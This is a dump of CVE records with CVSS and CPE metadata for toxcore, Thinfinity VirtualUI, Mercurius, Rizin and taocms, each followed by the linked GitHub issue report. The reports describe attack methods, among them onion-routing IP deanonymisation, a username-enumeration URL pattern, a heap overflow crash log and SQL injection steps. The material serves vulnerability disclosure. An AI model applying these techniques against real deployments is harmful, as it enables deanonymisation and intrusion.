[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://blog.tox.chat/2018/10/memory-leak-bug-and-new-toxcore-release-fixing-it/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/issues/1214" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/pull/1216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://blog.tox.chat/2018/10/memory-leak-bug-and-new-toxcore-release-fixing-it/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/issues/1214" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/pull/1216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:toktok:toxcore:*:*:*:*:*:*:*:*", "matchCriteriaId": "41E5F971-61F6-46C9-8E13-EB39CC8C1788", "versionEndExcluding": "0.2.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "404" ]
404
https://github.com/TokTok/c-toxcore/issues/1214
[ "Exploit", "Third Party Advisory" ]
github.com
[ "TokTok", "c-toxcore" ]
Happened on 2018-09-25. Seems like there is a memleak in the code. ``` <LittleVulpix> nurupo: Oh? Let's see... toxme.io is running so oh wiw wow* [2152112.531883] Out of memory: Kill process 3782 (tox-bootstrapd) score 893 or sacrifice child [2152112.643896] oom_reaper: reaped process 3782 (tox-bootstrapd), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB If so many went offline at that time I would imagine someone caused a leak to manifest in tox bootstrap daemon took down several nodes with it that way nurupo: node started but yeah I'm pretty sure this wouldn't have been random. I doubt we all started our nodes exactly at the same time so it must have been someone doing something with the network that caused bootstrap nodes to die <nurupo> are you sure it was tox-bootstrapd that filled up your ram and not some other program? <LittleVulpix> nurupo: not minding the fact the same happened to several completely unrelated machines, yeah I'm pretty sure [2152112.531817] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name [2152112.531846] [ 3782] 999 3782 467797 455738 903 4 0 0 tox-bootstrapd 467MB ram reserved 455 actually used normal resource usage is about 10-15MB RAM from what I remember soooo that's like 45x as much <iphy> LittleVulpix: interesting <nurupo> if there is a memory leak then it's likely to be in toxcore itself so every tox node (i.e. even a client), i don't think there is anything in tox-bootstrapd that can leak memory, so everything that uses toxcore is likely affected, even clients. also, a lot of nodes were using old toxcore, like irungentoo old, so if there is a memory leak issue - it must be long present <iphy> yes ``` ![nodes8](https://user-images.githubusercontent.com/467709/46196675-6703de80-c310-11e8-87a9-06c1438d8171.png)
Massive red shutdown of nodes
https://api.github.com/repos/TokTok/c-toxcore/issues/1214/comments
2
2018-09-28T08:19:22Z
2018-10-07T22:26:26Z
https://github.com/TokTok/c-toxcore/issues/1214
364,787,548
1,214
2,852
CVE-2018-25022
2021-12-13T01:15:07.587
The Onion module in toxcore before 0.2.2 doesn't restrict which packets can be onion-routed, which allows a remote attacker to discover a target user's IP address (when knowing only their Tox Id) by positioning themselves close to target's Tox Id in the DHT for the target to establish an onion connection with the attacker, guessing the target's DHT public key and creating a DHT node with public key close to it, and finally onion-routing a NAT Ping Request to the target, requesting it to ping the just created DHT node.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://blog.tox.chat/2018/04/security-vulnerability-and-new-toxcore-release" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/issues/873" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/pull/872" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://blog.tox.chat/2018/04/security-vulnerability-and-new-toxcore-release" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/issues/873" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/TokTok/c-toxcore/pull/872" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:toktok:toxcore:*:*:*:*:*:*:*:*", "matchCriteriaId": "26501D21-71F8-447C-9E4F-84528A58C30E", "versionEndExcluding": "0.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/TokTok/c-toxcore/issues/873
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "TokTok", "c-toxcore" ]
While implementing [tox in rust](https://github.com/tox-rs/tox) we've found vulnerability in onion module. Currently onion module allows to send any byte sequence through onion path. It can lead to possibility to bypass onion and get IP address (and friends list eventually) knowing only long term public key. Let's say Alice announces herself to Bob sending AnnounceRequest packet through onion path. After announcement Bob knows Alice's long term public key and onion return addresses to send packets back to Alice. But Bob doesn't know IP address of Alice and want to find it out. All he needs to do is send NAT ping request with his own DHT public key to Alice through onion path using onion return addresses he knows. If Bob is lucky enough to have close DHT public key to Alice's key Alice will redirect this ping request directly to Bob. After receiving his own request Bob will know IP address of Alice. Now, if somewone want to know somebody's IP address he can generate DHT key close enough to long term public key, wait for announce request, run many DHT nodes and send pings to them one by one. So I suggest to restrict packet kinds that can be sent through onion path: https://github.com/TokTok/c-toxcore/pull/872 I also monitored tox network through several DHT nodes and didn't notice anything other than onion announce/data packets is sent through onion. So this change shouldn't break anything.
Onion vulnerability
https://api.github.com/repos/TokTok/c-toxcore/issues/873/comments
5
2018-04-15T06:46:40Z
2022-02-05T01:05:51Z
https://github.com/TokTok/c-toxcore/issues/873
314,390,798
873
2,853
CVE-2021-44848
2021-12-13T02:15:06.790
In Cibele Thinfinity VirtualUI before 3.0, /changePassword returns different responses for invalid authentication requests depending on whether the username exists.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybelesoft/virtualui/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cybelesoft/virtualui/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*", "matchCriteriaId": "6EFA7DCD-AADB-4312-BCF9-A02DF4C56569", "versionEndExcluding": "3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/cybelesoft/virtualui/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cybelesoft", "virtualui" ]
Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a vulnerability in Thinfinity VirtualUI that allows a malicious actor to enumerate users registered in the OS (Windows) through /changePassword **How it works** By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest and krgtbt **Payload** The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced. **Vulnerable versions** It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.
Vulnerability - User Enumeration Unauthenticated
https://api.github.com/repos/cybelesoft/virtualui/issues/1/comments
1
2021-11-29T09:16:36Z
2021-12-15T17:53:53Z
https://github.com/cybelesoft/virtualui/issues/1
1,065,789,900
1
2,854
CVE-2021-43801
2021-12-13T20:15:07.577
Mercurius is a GraphQL adapter for Fastify. Any users from Mercurius@8.10.0 to 8.11.1 are subjected to a denial of service attack by sending a malformed JSON to `/graphql` unless they are using a custom error handler. The vulnerability has been fixed in https://github.com/mercurius-js/mercurius/pull/678 and shipped as v8.11.2. As a workaround users may use a custom error handler.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/issues/677" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/pull/678/commits/732b2f895312da8deadd7b173dcd2d141d54b223" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/security/advisories/GHSA-273r-rm8g-7f3x" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/issues/677" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/pull/678/commits/732b2f895312da8deadd7b173dcd2d141d54b223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/security/advisories/GHSA-273r-rm8g-7f3x" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mercurius_project:mercurius:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "8746C91F-FFCB-4ECD-BE62-EDFF7D9AACC6", "versionEndExcluding": "8.11.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "8.10.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "754" ]
754
https://github.com/mercurius-js/mercurius/issues/677
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "mercurius-js", "mercurius" ]
In production it's possible to see: ``` TypeError: Cannot read properties of undefined (reading 'reply') at defaultErrorFormatter (/app/node_modules/mercurius/lib/errors.js:67:19) at Object.<anonymous> (/app/node_modules/mercurius/lib/routes.js:139:40) at handleError (/app/node_modules/fastify/lib/reply.js:555:20) at onErrorHook (/app/node_modules/fastify/lib/reply.js:524:5) at _Reply.Reply.send (/app/node_modules/fastify/lib/reply.js:128:5) at done (/app/node_modules/fastify/lib/contentTypeParser.js:167:13) at Parser.defaultJsonParser [as fn] (/app/node_modules/fastify/lib/contentTypeParser.js:262:14) at IncomingMessage.onEnd (/app/node_modules/fastify/lib/contentTypeParser.js:243:27) at AsyncResource.runInAsyncScope (node:async_hooks:199:9) at IncomingMessage.emit (node:events:402:35) ``` This can happen if an error is thrown in a hook. We should be adding back the check for Context in the error handler. _Originally posted by @SimenB in https://github.com/mercurius-js/mercurius/pull/653#discussion_r760304267_
Context can be undefined in the error handler
https://api.github.com/repos/mercurius-js/mercurius/issues/677/comments
0
2021-12-01T16:53:59Z
2021-12-01T18:34:54Z
https://github.com/mercurius-js/mercurius/issues/677
1,068,652,286
677
2,855
CVE-2021-43814
2021-12-13T20:15:07.640
Rizin is a UNIX-like reverse engineering framework and command-line toolset. In versions up to and including 0.3.1 there is a heap-based out of bounds write in parse_die() when reversing an AMD64 ELF binary with DWARF debug info. When a malicious AMD64 ELF binary is opened by a victim user, Rizin may crash or execute unintended actions. No workaround are known and users are advised to upgrade.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/aa6917772d2f32e5a7daab25a46c72df0b5ea406" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2083" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-hqqp-vjcm-mw8r" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/aa6917772d2f32e5a7daab25a46c72df0b5ea406" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2083" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-hqqp-vjcm-mw8r" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*", "matchCriteriaId": "DDF54820-3CA2-49DC-9B65-DF480E8AF596", "versionEndExcluding": null, "versionEndIncluding": "0.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rizinorg/rizin/issues/2083
[ "Third Party Advisory" ]
github.com
[ "rizinorg", "rizin" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu 20.04 amd64 | File format of the file you reverse (mandatory) | ELF64 | Architecture/bits of the file (mandatory) | amd64 | `rizin -v` full output, **not truncated** (mandatory) | rizin 0.4.0-git @ linux-x86-64 commit: 5b6aaed68d84ac13de49b9400bd3bc7fe44eacbc, build: 2021-12-09__11:19:29 ### Expected behavior Analyzing binaries shouldn't trigger an OOB memory write. ### Actual behavior There is a heap-based out of bounds write in `parse_die` when reversing an amd64 elf binary with dwarf debug info, respectively. ### Steps to reproduce the behavior Analyze the binary attached below with aaa on an asan build to reproduce the crash. [binary.zip](https://github.com/rizinorg/rizin/files/7686382/binary.zip) ### Additional Logs, screenshots, source code, configuration dump, ... ``` $ LD_LIBRARY_PATH=/home/faraday/rizin_dyn_asan/lib/x86_64-linux-gnu/ /home/faraday/rizin_dyn_asan/bin/rizin -TQA crashes/id\:000031\,sig\:11\,src\:028821\,time\:410419260\,op\:ext_AO\,pos\:17016 ================================================================= ==61456==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200001df71 at pc 0x7f0e89427f2d bp 0x7ffcce5e6df0 sp 0x7ffcce5e6598 WRITE of size 40 at 0x60200001df71 thread T0 #0 0x7f0e89427f2c (/lib/x86_64-linux-gnu/libasan.so.5+0x67f2c) #1 0x7f0e85fb9f99 in parse_die ../librz/bin/dwarf.c:1730 #2 0x7f0e85fbaad3 in parse_comp_unit ../librz/bin/dwarf.c:1822 #3 0x7f0e85fbbdb4 in parse_info_raw ../librz/bin/dwarf.c:1955 #4 0x7f0e85fbcebe in rz_bin_dwarf_parse_info ../librz/bin/dwarf.c:2109 #5 0x7f0e857f436c in rz_core_bin_apply_dwarf ../librz/core/cbin.c:694 #6 0x7f0e857f103f in rz_core_bin_apply_info ../librz/core/cbin.c:316 #7 0x7f0e857f1611 in rz_core_bin_apply_all_info ../librz/core/cbin.c:369 #8 0x7f0e85848fc3 in rz_core_file_do_load_for_io_plugin ../librz/core/cfile.c:712 #9 0x7f0e8584afed in rz_core_bin_load ../librz/core/cfile.c:940 #10 0x7f0e8905abdd in rz_main_rizin ../librz/main/rizin.c:1128 #11 0x55a1564cd9bd in main ../binrz/rizin/rizin.c:57 #12 0x7f0e88e650b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #13 0x55a1564cd2ed in _start (/home/faraday/rizin_dyn_asan/bin/rizin+0x22ed) 0x60200001df71 is located 0 bytes to the right of 1-byte region [0x60200001df70,0x60200001df71) allocated by thread T0 here: #0 0x7f0e894cddc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6) #1 0x7f0e85fb5b47 in init_die ../librz/bin/dwarf.c:1223 #2 0x7f0e85fba990 in parse_comp_unit ../librz/bin/dwarf.c:1816 #3 0x7f0e85fbbdb4 in parse_info_raw ../librz/bin/dwarf.c:1955 #4 0x7f0e85fbcebe in rz_bin_dwarf_parse_info ../librz/bin/dwarf.c:2109 #5 0x7f0e857f436c in rz_core_bin_apply_dwarf ../librz/core/cbin.c:694 #6 0x7f0e857f103f in rz_core_bin_apply_info ../librz/core/cbin.c:316 #7 0x7f0e857f1611 in rz_core_bin_apply_all_info ../librz/core/cbin.c:369 #8 0x7f0e85848fc3 in rz_core_file_do_load_for_io_plugin ../librz/core/cfile.c:712 #9 0x7f0e8584afed in rz_core_bin_load ../librz/core/cfile.c:940 #10 0x7f0e8905abdd in rz_main_rizin ../librz/main/rizin.c:1128 #11 0x55a1564cd9bd in main ../binrz/rizin/rizin.c:57 #12 0x7f0e88e650b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x67f2c) Shadow bytes around the buggy address: 0x0c047fffbb90: fa fa fd fa fa fa fa fa fa fa fd fa fa fa fa fa 0x0c047fffbba0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fa fa 0x0c047fffbbb0: fa fa fd fa fa fa fa fa fa fa fd fd fa fa fd fa 0x0c047fffbbc0: fa fa fa fa fa fa fd fa fa fa fa fa fa fa fd fa 0x0c047fffbbd0: fa fa fa fa fa fa fd fa fa fa fa fa fa fa fd fa =>0x0c047fffbbe0: fa fa fa fa fa fa fd fa fa fa fd fd fa fa[01]fa 0x0c047fffbbf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd 0x0c047fffbc00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd 0x0c047fffbc10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd 0x0c047fffbc20: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd 0x0c047fffbc30: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==61456==ABORTING ``` The issue seems to be that at `dwarf.c:1223` the line `die->attr_values = calloc(sizeof(RzBinDwarfAttrValue), attr_count);` gets executed with `attr_count` equal to 0, so this is equivalent to a `malloc(0)` (I think in this case a chunk with the smallest allocatable size is returned, which should be around 16 or 32 bytes, but in `dwarf.c:1730` a die_attribute gets written, which is 40 bytes in size). This happens because in `dwarf.c:1729` the loop gets run `attr_count - 1` times, but as `abbrev->count` is 0 and is of type `size_t` this results in an undeflow which then triggers the OOB write.
Heap-based OOB write when parsing dwarf die info
https://api.github.com/repos/rizinorg/rizin/issues/2083/comments
4
2021-12-09T15:44:16Z
2021-12-10T14:55:59Z
https://github.com/rizinorg/rizin/issues/2083
1,075,719,455
2,083
2,856
CVE-2021-45014
2021-12-14T14:15:09.453
There is an upload sql injection vulnerability in the background of taocms 3.0.2 in parameter id:action=cms&ctrl=update&id=26
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/taogogo/taocms/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
1.The location of the vulnerability is line 59 in taocms\include\Model\Cms.php, and the incoming sql statement in the update() method does not use intval to process id The location of the vulnerability is line 59 in taocms\include\Model\Cms.php, and the incoming sql statement in the update() method does not use intval to process id ![image](https://user-images.githubusercontent.com/44251830/145678018-bf3e2abb-0b4a-4b06-b980-adfdaf1656e1.png) 2.Log in to the background as the default account admin. ![image](https://user-images.githubusercontent.com/44251830/145678042-ccc4cedd-3cdb-4f7d-951c-0d16c8a6a22f.png) ![image](https://user-images.githubusercontent.com/44251830/145678055-777544f7-5712-450c-9818-ac5e2d0c3f7c.png) 3.You can see action=cms&ctrl=update&id=26, this id is the id in the update method in the Cms.php file ![image](https://user-images.githubusercontent.com/44251830/145678073-010a6588-7291-4de7-b5e7-3ef2b0bf3b1f.png) ![image](https://user-images.githubusercontent.com/44251830/145678081-6c29f08f-a539-44e5-ae65-6769cf478d19.png) ![image](https://user-images.githubusercontent.com/44251830/145678085-f04993a3-b048-4d08-80bc-ff79d0580b52.png) 3.Test using the SQLMap tool ![image](https://user-images.githubusercontent.com/44251830/145678093-6d9ce8df-ccf9-4a8e-9582-80b36f2831df.png)
There is SQL blind injection at "Management article"
https://api.github.com/repos/taogogo/taocms/issues/11/comments
0
2021-12-11T13:20:17Z
2021-12-11T13:20:17Z
https://github.com/taogogo/taocms/issues/11
1,077,535,963
11
2,857
CVE-2021-45015
2021-12-14T14:15:09.493
taocms 3.0.2 is vulnerable to arbitrary file deletion via taocms\include\Model\file.php from line 60 to line 72.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/12" } ]
